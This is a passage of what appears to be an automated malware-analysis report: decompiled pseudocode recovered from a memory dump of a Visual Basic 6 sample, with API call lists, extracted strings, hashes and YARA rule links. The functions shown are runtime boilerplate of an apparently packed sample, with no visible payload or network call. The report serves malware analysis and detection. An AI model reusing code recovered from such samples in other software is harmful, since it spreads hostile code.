				}
				if( *0x435010 != 0) {
					_v112 = 0x435010;
				} else {
					_push(0x435010);
					_push(0x402614);
					L00401812();
					_v112 = 0x435010;
				}
				_t83 =  *((intOrPtr*)( *_v112));
				_t66 =  &_v28;
				L0040180C();
				_v92 = _t66;
				_v68 = 0x80020004;
				_v76 = 0xa;
				_v52 = 0x80020004;
				_v60 = 0xa;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v116 = _v80;
				asm("fild dword [ebp-0x70]");
				_v120 = _t100;
				_v68 = _v120;
				_t73 =  *((intOrPtr*)( *_v92 + 0x1b4))(_v92, _t83, 0x10, 0x10, 0x10, _t66,  *((intOrPtr*)(_t83 + 0x310))( *_v112));
				asm("fclex");
				_v96 = _t73;
				if(_v96 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x1b4);
					_push(0x403568);
					_push(_v92);
					_push(_v96);
					L00401800();
					_v124 = _t73;
				}
				_push( &_v28);
				_t75 =  &_v24;
				_push(_t75);
				_push(2);
				L004017A0();
				asm("wait");
				_push(0x42cd38);
				return _t75;
			}

0x0042cb6a
0x0042cb6f
0x0042cb7a
0x0042cb7b
0x0042cb82
0x0042cb85
0x0042cb8d
0x0042cb90
0x0042cb9e
0x0042cbb8
0x0042cba0
0x0042cba0
0x0042cba5
0x0042cbaa
0x0042cbaf
0x0042cbaf
0x0042cbd3
0x0042cbd7
0x0042cbdc
0x0042cbeb
0x0042cbf1
0x0042cbf3
0x0042cbfa
0x0042cc16
0x0042cbfc
0x0042cbfc
0x0042cc01
0x0042cc06
0x0042cc09
0x0042cc0c
0x0042cc11
0x0042cc11
0x0042cc21
0x0042cc3b
0x0042cc23
0x0042cc23
0x0042cc28
0x0042cc2d
0x0042cc32
0x0042cc32
0x0042cc4c
0x0042cc56
0x0042cc5a
0x0042cc5f
0x0042cc62
0x0042cc69
0x0042cc70
0x0042cc77
0x0042cc7e
0x0042cc85
0x0042cc8f
0x0042cc99
0x0042cc9a
0x0042cc9b
0x0042cc9c
0x0042cca0
0x0042ccaa
0x0042ccab
0x0042ccac
0x0042ccad
0x0042ccb1
0x0042ccbb
0x0042ccbc
0x0042ccbd
0x0042ccbe
0x0042ccc3
0x0042ccc6
0x0042ccc9
0x0042ccd0
0x0042ccdb
0x0042cce1
0x0042cce3
0x0042ccea
0x0042cd06
0x0042ccec
0x0042ccec
0x0042ccf1
0x0042ccf6
0x0042ccf9
0x0042ccfc
0x0042cd01
0x0042cd01
0x0042cd0d
0x0042cd0e
0x0042cd11
0x0042cd12
0x0042cd14
0x0042cd1c
0x0042cd1d
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042CB85
__vbaNew2.MSVBVM60(00402614,00435010,?,?,?,?,004015F6), ref: 0042CBAA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042CBD7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000180), ref: 0042CC0C
__vbaNew2.MSVBVM60(00402614,00435010), ref: 0042CC2D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042CC5A
__vbaChkstk.MSVBVM60(?,00000000), ref: 0042CC8F
__vbaChkstk.MSVBVM60(?,00000000), ref: 0042CCA0
__vbaChkstk.MSVBVM60(?,00000000), ref: 0042CCB1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,000001B4,?,?,00000000), ref: 0042CCFC
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0042CD14

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckHresultNew2$FreeList
String ID:
API String ID: 2221171844-0
Opcode ID: 8c543ab122c66626ce4dfb5cab9a4c5bfaa24d817b1b10464a313f36892f1c77
Instruction ID: 399ee5dc7bc77f5f3b8cf8f138a9a08c0a34aa911e55b265cb67dbf54b9de203
Opcode Fuzzy Hash: 8c543ab122c66626ce4dfb5cab9a4c5bfaa24d817b1b10464a313f36892f1c77
Instruction Fuzzy Hash: 06514875D00708AFCB01DFD1D885B9DBBB9BF09304F20442AF501BB2A1C7BA1645DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042CFA5, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0042CFA5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				signed int _v48;
				short _v52;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _t57;
				signed int _t62;
				signed int _t66;
				intOrPtr _t79;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t79;
				_push(0x34);
				L004015F0();
				_v12 = _t79;
				_v8 = 0x401460;
				L0040178E();
				if( *0x435744 != 0) {
					_v60 = 0x435744;
				} else {
					_push(0x435744);
					_push(0x40342c);
					L00401812();
					_v60 = 0x435744;
				}
				_t7 =  &_v60; // 0x435744
				_v36 =  *((intOrPtr*)( *_t7));
				_t57 =  *((intOrPtr*)( *_v36 + 0x4c))(_v36,  &_v28);
				asm("fclex");
				_v40 = _t57;
				if(_v40 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x40341c);
					_push(_v36);
					_push(_v40);
					L00401800();
					_v64 = _t57;
				}
				_v44 = _v28;
				_t62 =  *((intOrPtr*)( *_v44 + 0x20))(_v44,  &_v32);
				asm("fclex");
				_v48 = _t62;
				if(_v48 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x20);
					_push(0x403494);
					_push(_v44);
					_push(_v48);
					L00401800();
					_v68 = _t62;
				}
				_v52 =  ~(0 | _v32 != 0x00000000);
				L004017FA();
				_t66 = _v52;
				if(_t66 != 0) {
					_t66 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4);
					_v36 = _t66;
					if(_v36 >= 0) {
						_v72 = _v72 & 0x00000000;
					} else {
						_push(0x72c);
						_push(0x403224);
						_push(_a4);
						_push(_v36);
						L00401800();
						_v72 = _t66;
					}
				}
				_push(0x42d0ea);
				L0040182A();
				return _t66;
			}

0x0042cfaa
0x0042cfb5
0x0042cfb6
0x0042cfbd
0x0042cfc0
0x0042cfc8
0x0042cfcb
0x0042cfd8
0x0042cfe4
0x0042cffe
0x0042cfe6
0x0042cfe6
0x0042cfeb
0x0042cff0
0x0042cff5
0x0042cff5
0x0042d005
0x0042d00a
0x0042d019
0x0042d01c
0x0042d01e
0x0042d025
0x0042d03e
0x0042d027
0x0042d027
0x0042d029
0x0042d02e
0x0042d031
0x0042d034
0x0042d039
0x0042d039
0x0042d045
0x0042d054
0x0042d057
0x0042d059
0x0042d060
0x0042d079
0x0042d062
0x0042d062
0x0042d064
0x0042d069
0x0042d06c
0x0042d06f
0x0042d074
0x0042d074
0x0042d088
0x0042d08f
0x0042d094
0x0042d09a
0x0042d0a4
0x0042d0aa
0x0042d0b1
0x0042d0cd
0x0042d0b3
0x0042d0b3
0x0042d0b8
0x0042d0bd
0x0042d0c0
0x0042d0c3
0x0042d0c8
0x0042d0c8
0x0042d0b1
0x0042d0d1
0x0042d0e4
0x0042d0e9

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042CFC0
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 0042CFD8
__vbaNew2.MSVBVM60(0040342C,00435744,?,?,?,?,004015F6), ref: 0042CFF0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,0000004C,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042D034
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403494,00000020,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042D06F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042D08F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403224,0000072C), ref: 0042D0C3
__vbaFreeStr.MSVBVM60(0042D0EA,?,?,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042D0E4

Strings

DWC, xrefs: 0042D005

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$ChkstkCopyNew2
String ID: DWC
API String ID: 1094332766-2466064311
Opcode ID: c76de95ce9b927fcb8e5e4e805cd909bf485b8d9c0e7c89939ff4326a2f41f80
Instruction ID: 81dd2f4eac18d41e92d88f1cb194cbf5df955f449f669cab9d8d988551937424
Opcode Fuzzy Hash: c76de95ce9b927fcb8e5e4e805cd909bf485b8d9c0e7c89939ff4326a2f41f80
Instruction Fuzzy Hash: EE41D171E00218EFCF01EFA5D945BDEBBB5FB08759F10802AF001BA2A1D7785942DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00433BD7, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00433BD7(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				char _v44;
				char* _v52;
				intOrPtr _v60;
				char* _t19;
				void* _t30;
				void* _t32;
				long long* _t33;

				_t33 = _t32 - 0xc;
				 *[fs:0x0] = _t33;
				L004015F0();
				_v16 = _t33;
				_v12 = 0x4015e0;
				_v8 = 0;
				_t19 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4015f6, _t30);
				asm("fld1");
				 *_t33 = __fp0;
				asm("fld1");
				 *_t33 = __fp0;
				asm("fld1");
				 *_t33 = __fp0;
				 *_t33 =  *0x4015d8;
				L00401686();
				L0040184E();
				asm("fcomp qword [0x4014c8]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v52 = L"spermatozoerne";
					_v60 = 8;
					L00401794();
					_t19 =  &_v44;
					_push(_t19);
					L00401680();
					L0040183C();
					L00401824();
				}
				asm("wait");
				_push(0x433c9a);
				L0040182A();
				return _t19;
			}

0x00433bda
0x00433be9
0x00433bf3
0x00433bfb
0x00433bfe
0x00433c05
0x00433c14
0x00433c17
0x00433c1b
0x00433c1e
0x00433c22
0x00433c25
0x00433c29
0x00433c34
0x00433c37
0x00433c3c
0x00433c41
0x00433c47
0x00433c49
0x00433c4a
0x00433c4c
0x00433c53
0x00433c60
0x00433c65
0x00433c68
0x00433c69
0x00433c73
0x00433c7b
0x00433c7b
0x00433c80
0x00433c81
0x00433c94
0x00433c99

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00433BF3
#672.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 00433C37
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 00433C3C
__vbaVarDup.MSVBVM60 ref: 00433C60
#667.MSVBVM60(?), ref: 00433C69
__vbaStrMove.MSVBVM60(?), ref: 00433C73
__vbaFreeVar.MSVBVM60(?), ref: 00433C7B
__vbaFreeStr.MSVBVM60(00433C9A,?,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 00433C94

Strings

spermatozoerne, xrefs: 00433C4C

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#667#672ChkstkMove
String ID: spermatozoerne
API String ID: 1130133066-4260068476
Opcode ID: f7d4702cb65e22ad4c6362e5f1eba00f89540da7b878d6b6ee1bca9f2c1e54a4
Instruction ID: eb360dfb02ed2e68eeeab8b2fd8c924e602928b98f8e24a4a722911c2e9ab6b5
Opcode Fuzzy Hash: f7d4702cb65e22ad4c6362e5f1eba00f89540da7b878d6b6ee1bca9f2c1e54a4
Instruction Fuzzy Hash: 48113D71810508BBCB05BFA1DD4AEEEBBB8EF44704F40956EF041761A1DBB85A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00433387, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00433387(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				char _v76;
				intOrPtr _t12;
				char* _t14;
				char* _t15;
				char* _t17;
				intOrPtr _t25;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t25;
				_t12 = 0x3c;
				L004015F0();
				_v12 = _t25;
				_v8 = 0x401550;
				L004016CE();
				_v24 = _t12;
				_push(0);
				_push(L"WhatsThisHelpID");
				_push(0);
				_push(L"Opsione13");
				_push( &_v44);
				_t14 =  &_v60;
				_push(_t14);
				L00401830();
				_push(_t14);
				_t15 =  &_v76;
				_push(_t15);
				L004017E8();
				_push(_t15);
				L00401782();
				_v28 = _t15;
				_push( &_v76);
				_t17 =  &_v60;
				_push(_t17);
				_push(2);
				L00401842();
				_push(0x433425);
				L00401824();
				return _t17;
			}

0x0043338c
0x00433397
0x00433398
0x004333a1
0x004333a2
0x004333aa
0x004333ad
0x004333b4
0x004333b9
0x004333bc
0x004333be
0x004333c3
0x004333c5
0x004333cd
0x004333ce
0x004333d1
0x004333d2
0x004333da
0x004333db
0x004333de
0x004333df
0x004333e7
0x004333e8
0x004333ed
0x004333f3
0x004333f4
0x004333f7
0x004333f8
0x004333fa
0x00433402
0x0043341f
0x00433424

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 004333A2
#615.MSVBVM60(?,?,?,?,004015F6), ref: 004333B4
__vbaVarLateMemCallLdRf.MSVBVM60(?,?,Opsione13,00000000,WhatsThisHelpID,00000000,?,?,?,?,004015F6), ref: 004333D2
__vbaVarLateMemCallLd.MSVBVM60(?,00000000), ref: 004333DF
__vbaI4Var.MSVBVM60(00000000), ref: 004333E8
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000), ref: 004333FA
__vbaFreeVar.MSVBVM60(00433425,?,?,00000000), ref: 0043341F

Strings

Opsione13, xrefs: 004333C5
WhatsThisHelpID, xrefs: 004333BE

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CallFreeLate$#615ChkstkList
String ID: Opsione13$WhatsThisHelpID
API String ID: 2423698839-1233822818
Opcode ID: 171639952c2e7cd8906d8268dbebf0980e0f2fec23f60e7a2929613a54f7df69
Instruction ID: 011f8a2ae9fb13d83cb69575f117a17111714cbd451e95136f0d390014081480
Opcode Fuzzy Hash: 171639952c2e7cd8906d8268dbebf0980e0f2fec23f60e7a2929613a54f7df69
Instruction Fuzzy Hash: C9010CB2940208BADB01BB95CC47FEEBABCAB14744F14042BF501B61D2EA79674486A9

Uniqueness

Uniqueness Score: -1.00%

Function 00433736, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00433736(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v44;
				char _v76;
				char* _t18;
				void* _t24;
				void* _t26;
				intOrPtr _t27;

				_t27 = _t26 - 0xc;
				 *[fs:0x0] = _t27;
				L004015F0();
				_v16 = _t27;
				_v12 = 0x401590;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4015f6, _t24);
				_push(0);
				_push(L"ShowWhatsThis");
				_push(0);
				_push(L"Opsione16");
				_push( &_v44);
				_t18 =  &_v76;
				_push(_t18);
				L00401830();
				_push(_t18);
				L004017BE();
				_push(_t18);
				L004016AA();
				L00401824();
				_v28 = 0x2f4c;
				_push(0x4337d4);
				L00401824();
				return _t18;
			}

0x00433739
0x00433748
0x00433752
0x0043375a
0x0043375d
0x00433764
0x00433773
0x00433776
0x00433778
0x0043377d
0x0043377f
0x00433787
0x00433788
0x0043378b
0x0043378c
0x00433794
0x00433795
0x0043379a
0x0043379b
0x004337a6
0x004337ab
0x004337b1
0x004337ce
0x004337d3

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00433752
__vbaVarLateMemCallLdRf.MSVBVM60(?,?,Opsione16,00000000,ShowWhatsThis,00000000,?,?,?,?,004015F6), ref: 0043378C
__vbaObjVar.MSVBVM60(00000000,?,?,?,004015F6), ref: 00433795
__vbaLateMemCall.MSVBVM60(00000000,00000000,?,?,?,004015F6), ref: 0043379B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 004337A6
__vbaFreeVar.MSVBVM60(004337D4), ref: 004337CE

Strings

L/, xrefs: 004337AB
Opsione16, xrefs: 0043377F
ShowWhatsThis, xrefs: 00433778

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CallFreeLate$Chkstk
String ID: L/$Opsione16$ShowWhatsThis
API String ID: 1147168291-3723529959
Opcode ID: cb9ff76a7cdea0a196570d0c720719902229223d851cf1e7540946450e70c89d
Instruction ID: 961d2c62cb4ebbdd216bcec49d696575b7f99413c5c2fa87b1cf9921fd93dbbe
Opcode Fuzzy Hash: cb9ff76a7cdea0a196570d0c720719902229223d851cf1e7540946450e70c89d
Instruction Fuzzy Hash: EF011EB1940208BBCB00EB95CD46F8EBBB8AF04B44F54442AF501B71E2D77C96458B99

Uniqueness

Uniqueness Score: -1.00%

Function 00427EC5, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00427EC5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L004015F0();
				_v12 = _t76;
				_v8 = 0x401210;
				L004017C4();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x4015f6, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4031f4);
					_push(_a4);
					_push(_v76);
					L00401800();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004017C4();
				L004017B2();
				_v28 = E00433D59( &_v36);
				L004017FA();
				_v32 = E00433D59(_v28) + 0x2b0;
				E00433DC0(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x4031f4);
					_push(_a4);
					_push(_v76);
					L00401800();
					_v88 = _t62;
				}
				_push(0x428008);
				L004017FA();
				return _t62;
			}

0x00427ec5
0x00427ed6
0x00427ee0
0x00427ee8
0x00427eeb
0x00427ef9
0x00427f0a
0x00427f0d
0x00427f0f
0x00427f16
0x00427f2f
0x00427f18
0x00427f18
0x00427f1a
0x00427f1f
0x00427f22
0x00427f25
0x00427f2a
0x00427f2a
0x00427f36
0x00427f40
0x00427f49
0x00427f54
0x00427f5a
0x00427f6c
0x00427f75
0x00427f7a
0x00427f81
0x00427f88
0x00427f8f
0x00427f99
0x00427fa3
0x00427fa4
0x00427fa5
0x00427fa6
0x00427faa
0x00427fb4
0x00427fb5
0x00427fb6
0x00427fb7
0x00427fc0
0x00427fc6
0x00427fc8
0x00427fcf
0x00427feb
0x00427fd1
0x00427fd1
0x00427fd6
0x00427fdb
0x00427fde
0x00427fe1
0x00427fe6
0x00427fe6
0x00427fef
0x00428002
0x00428007

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00427EE0
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00427EF9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004031F4,00000058), ref: 00427F25
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00427F40
#644.MSVBVM60(?,?,?), ref: 00427F49
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00427F5A
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00427F99
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00427FAA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004031F4,000002B0), ref: 00427FE1
__vbaFreeObj.MSVBVM60(00428008), ref: 00428002

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: 29318de85763dc90bf15de73d1ff0a7d256d886b21cf3d10c697af5fd94846a7
Instruction ID: 70eaf9c02f8feea6bf30742860e50f417a6dd7379d32a53da999aff45911943c
Opcode Fuzzy Hash: 29318de85763dc90bf15de73d1ff0a7d256d886b21cf3d10c697af5fd94846a7
Instruction Fuzzy Hash: 13411771900218EFDF01EFA1C846BDEBBB5FF08744F10442AF501BB1A1D7B99A869B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042BE59, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0042BE59(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				void* _v44;
				char _v60;
				char _v76;
				char* _v84;
				intOrPtr _v92;
				char* _t22;
				intOrPtr _t34;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_push(0x4c);
				L004015F0();
				_v12 = _t34;
				_v8 = 0x4013d0;
				L00401794();
				_v84 = L"10/10/10";
				_v92 = 8;
				L00401794();
				_push( &_v60);
				_push( &_v76);
				L0040175E();
				_push( &_v76);
				L00401764();
				_v28 = __fp0;
				_push( &_v76);
				_t22 =  &_v60;
				_push(_t22);
				_push(2);
				L00401842();
				asm("wait");
				_push(0x42bef9);
				L00401824();
				return _t22;
			}

0x0042be5e
0x0042be69
0x0042be6a
0x0042be71
0x0042be74
0x0042be7c
0x0042be7f
0x0042be8c
0x0042be91
0x0042be98
0x0042bea5
0x0042bead
0x0042beb1
0x0042beb2
0x0042beba
0x0042bebb
0x0042bec0
0x0042bec6
0x0042bec7
0x0042beca
0x0042becb
0x0042becd
0x0042bed5
0x0042bed6
0x0042bef3
0x0042bef8

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042BE74
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0042BE8C
__vbaVarDup.MSVBVM60 ref: 0042BEA5
#687.MSVBVM60(?,?), ref: 0042BEB2
__vbaDateVar.MSVBVM60(?,?,?), ref: 0042BEBB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0042BECD
__vbaFreeVar.MSVBVM60(0042BEF9), ref: 0042BEF3

Strings

10/10/10, xrefs: 0042BE91

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#687ChkstkDateList
String ID: 10/10/10
API String ID: 1168886835-3441672559
Opcode ID: 077cce47d34ad43c837c4e77cbd5793fb6bfb57ffe8c69624bc13f2526f926c9
Instruction ID: 115533d916a611931d044a1eea2b78f04e5873bb0e06a33195041d236f100996
Opcode Fuzzy Hash: 077cce47d34ad43c837c4e77cbd5793fb6bfb57ffe8c69624bc13f2526f926c9
Instruction Fuzzy Hash: 7D0100B190024DAADB00EFD1D846EDEBB7CEF04704F40452BF101B7591EBB866498BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004337FD, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E004337FD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v72;
				char* _t17;
				void* _t23;
				void* _t25;
				intOrPtr _t26;

				_t26 = _t25 - 0xc;
				 *[fs:0x0] = _t26;
				L004015F0();
				_v16 = _t26;
				_v12 = 0x4015a0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x4015f6, _t23);
				_push(0);
				_push(L"ZOrder");
				_push(0);
				_push(L"Opsione15");
				_push( &_v40);
				_t17 =  &_v72;
				_push(_t17);
				L00401830();
				_push(_t17);
				L004017BE();
				_push(_t17);
				L004016AA();
				L00401824();
				_push(0x433895);
				L00401824();
				return _t17;
			}

0x00433800
0x0043380f
0x00433819
0x00433821
0x00433824
0x0043382b
0x0043383a
0x0043383d
0x0043383f
0x00433844
0x00433846
0x0043384e
0x0043384f
0x00433852
0x00433853
0x0043385b
0x0043385c
0x00433861
0x00433862
0x0043386d
0x00433872
0x0043388f
0x00433894

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00433819
__vbaVarLateMemCallLdRf.MSVBVM60(?,00000000,Opsione15,00000000,ZOrder,00000000,?,?,?,?,004015F6), ref: 00433853
__vbaObjVar.MSVBVM60(00000000,?,?,?,004015F6), ref: 0043385C
__vbaLateMemCall.MSVBVM60(00000000,00000000,?,?,?,004015F6), ref: 00433862
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 0043386D
__vbaFreeVar.MSVBVM60(00433895,?,?,?,?,?,?,004015F6), ref: 0043388F

Strings

ZOrder, xrefs: 0043383F
Opsione15, xrefs: 00433846

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CallFreeLate$Chkstk
String ID: Opsione15$ZOrder
API String ID: 1147168291-2868589429
Opcode ID: 8c09353818523e4858aa44e81ae8e44289b5adcd2e8ccc75a006173e5430787e
Instruction ID: e08d4d02cda776520a7a6b1957e0957cf9149577e9db0b43e676b05bf697ee0a
Opcode Fuzzy Hash: 8c09353818523e4858aa44e81ae8e44289b5adcd2e8ccc75a006173e5430787e
Instruction Fuzzy Hash: 15012CB1940208BBCB05FB95CD46F8E7BB8AB44744F50446BB501BB1E2DA7DAB048A98

Uniqueness

Uniqueness Score: -1.00%

Function 0043314C, Relevance: 13.5, APIs: 9, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 55%

